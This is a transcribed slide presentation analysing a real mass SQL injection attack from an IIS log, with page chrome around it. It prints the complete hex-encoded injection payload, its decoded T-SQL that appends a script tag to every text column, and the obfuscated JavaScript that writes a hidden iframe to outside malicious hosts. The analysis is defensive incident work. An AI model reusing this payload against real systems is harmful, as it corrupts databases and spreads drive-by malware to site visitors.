Sql injection attack overview
This presentation is the property of its rightful owner.
Sponsored Links
1 / 12

SQL Injection Attack Overview PowerPoint PPT Presentation


  • 88 Views
  • Uploaded on
  • Presentation posted in: General

SQL Injection Attack Overview. Step by step analysis of a SQL Injection attack. Code Obfuscation a Definition IIS Log Entry Decoding the HEX Part 1 SQL Injection Code Decoding the HEX Part 2 Injected Code Where is this coming from?. Code Obfuscation a Definition.

Download Presentation

SQL Injection Attack Overview

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Sql injection attack overview

SQL Injection AttackOverview


Step by step analysis of a sql injection attack

Step by step analysis of a SQL Injection attack

  • Code Obfuscation a Definition

  • IIS Log Entry

  • Decoding the HEX Part 1

  • SQL Injection Code

  • Decoding the HEX Part 2

  • Injected Code

  • Where is this coming from?


Code obfuscation a definition

Code Obfuscation a Definition

  • “Obfuscated code is source or machine code that has been made difficult to understand. Programmers may deliberately obfuscate code to conceal its purpose (a form of security through obscurity), to deter reverse engineering, or as a puzzle or recreational challenge for readers. Programs known as obfuscators transform human-readable code into obfuscated code using various techniques.” -Wikipedia


Iis log entry

IIS Log Entry

This is the IIS log that is generated during the attack. In the next slide we remove the URL encoding and make the information highlighted in yellow more readable.

  • \\web101\Logs$\IIS\W3SVC1\u_ex090926.log:2009-09-26 16:41:23 W3SVC1 WEB101 1.1.1.1 GET /client/file.asp adid=24&category=Texas+03-04%2F08;[email protected]%20VaRcHAr(4000);[email protected]=casT(0x4445436C417245204054205641524348617228323535292C406320566152436861522832353529206445636C417265207461424C655F637552736F5220435552536F5220664F722053456C45437420412E6E616D652C622E6E616D652046726F4D207379736F626A4543747320612C735973434F6C554D6E73206220776865726520412E49643D622E696420614E6420412E58547950453D27752720614E442028622E58747950653D3939206F5220622E58547970453D3335206F7220422E58747950653D323331204F7220422E58745970453D31363729204F70456E207441426C455F435552734F72204645746348204E6578742046726F6D207441624C655F435572734F5220494E546F2040542C4063207768696C4528404046455463685F5354417455533D302920426567696E20457845632827557064615465205B272B40542B275D20534574205B272B40432B275D3D525452694D28434F6E5665727428564172434841522834303030292C5B272B40432B275D29292B4341535428305833433733363337323639373037343230373337323633334436383734373437303341324632463737373737373245363236313645364536353732373432453732373532463631363437333245364137333345334332463733363337323639373037343345206173207641524348417228353129292729204665746348204E6558742046524F4D205441624C455F635572736F7220694E744F2040742C404320456E4420436C4F7365205441624C455F437572736F72206445414C6C4F63415445205441424C655F435552736F5220%20aS%20varcHAr(4000));exEc(@S);-- 80 - 123.204.243.229 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.domain.com 200 0 0 13542 1641 1015


Iis log entry removing url encoding

After removing the URL encoding and adding some line feeds we have the following code. The cast statement converts the log HEX string into a Variable Character Field (varchar). Next the EXEC command executes this decoded string.

IIS Log Entry - Removing URL Encoding

CAST: Translates the HEX expression into a character string

  • /client/file.asp

  • adid=24&category=Texas 03-04/08;

  • DECLARE @s VaRcHAr(4000);

  • SET @S=casT( 0x4445436C417245204054205641524348617228323535292C406320566152436861522832353529206445636C417265207461424C655F637552736F5220435552536F5220664F722053456C45437420412E6E616D652C622E6E616D652046726F4D207379736F626A4543747320612C735973434F6C554D6E73206220776865726520412E49643D622E696420614E6420412E58547950453D27752720614E442028622E58747950653D3939206F5220622E58547970453D3335206F7220422E58747950653D323331204F7220422E58745970453D31363729204F70456E207441426C455F435552734F72204645746348204E6578742046726F6D207441624C655F435572734F5220494E546F2040542C4063207768696C4528404046455463685F5354417455533D302920426567696E20457845632827557064615465205B272B40542B275D20534574205B272B40432B275D3D525452694D28434F6E5665727428564172434841522834303030292C5B272B40432B275D29292B4341535428305833433733363337323639373037343230373337323633334436383734373437303341324632463737373737373245363236313645364536353732373432453732373532463631363437333245364137333345334332463733363337323639373037343345206173207641524348417228353129292729204665746348204E6558742046524F4D205441624C455F635572736F7220694E744F2040742C404320456E4420436C4F7365205441624C455F437572736F72206445414C6C4F63415445205441424C655F435552736F5220 aS varcHAr(4000));

  • exEc(@S);

EXEC: Executes this string


Decoding the hex part 1

Here we decode the HEX into its ASCII equivalent. Once we apply it to the entire string we have the full code. I’d like to point out that this code is somewhat dynamic in nature. You can see a variety of upper and lower case characters in the code.

This causes the encoded HEX to vary significantly from attack to attack and is an attempt to avoid detection.

The query in the begining of the code uses an interesting trick by using sysobject and syscolumns, special tables within SQL Server. The query selects all User defined tables and then limits it to columns with datatypes that can hold a string of characters.

It then loops through all of these columns and appends a string to each row. This string is also encoded in HEX. We will look at this further in the next slide.

Decoding the HEX part 1

sysobjects: Contains one row for each object (constraint, default, log, rule, stored procedure, and so on) created within a database.

syscolumns: Contains one row for every column in every table and view, and a row for each parameter in a stored procedure. This table is in each database.

  • 0x4445436C41724520405420564152434861…

    • 0x44 = 68 = D

    • 0x45 = 69 = E

    • 0x43 = 67 = C

    • 0x6C = 108 = l

    • 0x41 = 65 = A

    • 0x72 = 114 = r

    • 0x45 = 69 = E

    • 0x20 = 32 =

    • 0x40 = 64 = @

    • 0x54 = 84 = T

    • 0x20 = 32 =

    • 0x56 = 86 = V

    • 0x41 = 65 = A

    • 0x52 = 82 = R

    • 0x43 = 67 = C

    • 0x48 = 72 = H

    • 0x61 = 97 = a

  • DEClArE @T VARCHar(255),@c VaRChaR(255)

  • dEclAre taBLe_cuRsoR CURSoR

  • fOr SElECt A.name,b.name FroM sysobjECts a, sYsCOlUMns b

  • where A.Id=b.id aNd A.XTyPE='u' aND (b.XtyPe=99 oR b.XTypE=35 or B.XtyPe=231 Or B.XtYpE=167)

  • OpEn tABlE_CURsOr

  • FEtcH Next From tAbLe_CUrsOR INTo @T,@c

  • whilE(@@FETch_STAtUS=0)

  • Begin

  • ExEc('UpdaTe [[email protected]+']

  • SEt [[email protected]+']=

  • RTRiM(COnVert(VArCHAR(4000),[[email protected]+']))+

  • CAST(0X3C736372697074207372633D687474703A2F2F7777772E6

  • 2616E6E6572742E72752F6164732E6A733E3C2F7363726970743E

  • as vARCHAr(51))')

  • FetcH NeXt FROM TAbLE_cUrsor iNtO @t,@C

  • EnD

  • ClOse TAbLE_Cursor

  • dEALlOcATE TABLe_CURsoR

XType:

U = User table

35 = text

99 = ntext

167 = varchar

231 = nvarchar


Decoding the hex part 2

Using the same method as before we very easily determine that the injected string is a script tag pointing to ads.js. I have also experienced changes to this URL from attack to attack. I have decoded about four different locations for ads.js as of this writing.

Decoding the HEX part 2

  • 0x3C736372697074207372633D687474703A2F2F7777772E626

    16E6E6572742E72752F6164732E6A733E3C2F7363726970743E

  • <script src=http://www.bannert.ru/ads.js></script>


Injected code java script

Since most of the code within ads.js is not utilized I’ll stick with what is. The first part is an interesting way of hiding the write command. They utilize the replace function to remove the 5 from within the string literal concealing it from detection.

The two functions within the write statement are very similar so I will only explain one of them but I will indicate where their differences are.

Injected Code – Java Script

  • <script src=http://www.bannert.ru/ads.js></script>

  • document['wri5te'.replace(/[0-9]/,'')](RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));

  • write(RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));


Injected code java script1

The first part of this function sets up some variables. These variables are the only differences between the two functions. The first two are a decryption key and the last is the cipher text.

The next step is for the code to set up an array based on the cipher text split on the commas. For example the first array element would be 90+0.

Next it loops through each of these elements and splits it once again however on the plus sign. It then performs the decryption mathematics and determines the resultant string.

Injected Code – Java Script

<iframe width=1 height=1 border=0 frameborder=0 s

function RfCEPXiV(KDZJF){

var Ffwx=6,

TMplSKEfAW=4;

var VhoWIRnEH='90+0,157+2,153+0,171+0,145+2,163+2,151+2,48+0,178+2,157+2,

150+0,174+0,156+0,91+2,73+2,48+0,156+0,151+2,157+2,154+2,156+0,174+0,91+2,

73+2,48+0,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,153+0,171+0,

145+2,163+2,151+2,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,172+2,

171+0,',

QlnGAowZ=VhoWIRnEH.split(',');

gHuP='';

for(THLfo=0;THLfo<QlnGAowZ.length-1;THLfo++)

{

MhbtCwq=QlnGAowZ[THLfo].split('+');

gAJys = parseInt(MhbtCwq[0]*TMplSKEfAW)+parseInt(MhbtCwq[1]);

gAJys = parseInt(gAJys)/Ffwx;

gHuP += String.fromCharCode(gAJys);

}

return gHuP;}

Splits the string at the commas

90*4 + 0 = 360

157*4 + 2 = 630

153*4 + 0 = 612

171*4 + 0 = 684

145*4 + 2 = 582

Splits the string at the plus

360/6 = 60

630/6 = 105

612/6 = 102

684/6 = 114

582/6 = 97

60 = <

105 = i

102 = f

114 = r

97 = a


Injected code php css

The results form both functions result in an iframe which loads index.php. At this point I stopped my investigation partly because the index.php file returned a Page Not Found error. As noted bellow there are three possible conditions at this point.

Injected Code – php & css

  • <iframe width=1 height=1 border=0 frameborder=0 src='http://ads-t.ru/ad/index.php'></iframe>

  • Index.php simulates an ‘Error 404 - Page Not Found’ however it has custom Java Script as well as a cascading style sheet which specifies background images.

  • One of three conditions exist.

    • This site has been identified as malicious and has been removed from the hosting provider

    • The images specified in the CSS could be malicious in nature.

    • They have not activated the malicious code and could do so at anytime.


Where is this coming from

By performing a WhoIs on the source address identified in the IIS logs we can determine that this particular attack originated from Taiwan. IP addresses for other attacks varied in origin however so far all have originated from Asia.

After some communications with the Internet Storm Center I was provided with a link to a diary entry for April 16, 2008 (click here to see it). The handlers at the ISC actually have the code (apparently written in Chinese) that utilizes Google to identify sites that are vulnerable to this attack.

The program performs a Google search for a string that would indicate a vulnerable site and then executes the attack against them.

Where is this coming from?

inetnum: 123.204.0.0 - 123.205.255.255

netname: SEEDNET-NET

descr: Digital United Inc.

descr: 7F,220,gangchi road

descr: Taipei Taiwan 114

country: TW

admin-c: MC37-AP

tech-c: MC37-AP

status: ALLOCATED PORTABLE

notify: [email protected]

mnt-by: MAINT-TW-TWNIC

mnt-lower: MAINT-TW-TWNIC

mnt-routes: MAINT-TW-TWNIC

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

remarks: This object can only be updated by APNIC hostmasters.

remarks: To update this object, please contact APNIC

remarks: hostmasters and include your organisation's account

remarks: name in the subject line.

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

changed: [email protected] 20061228

source: APNIC

  • 123.204.243.229


Sql injection attack overview1

SQL Injection AttackOverview

Thank you for watching

Fred Stuck


  • Login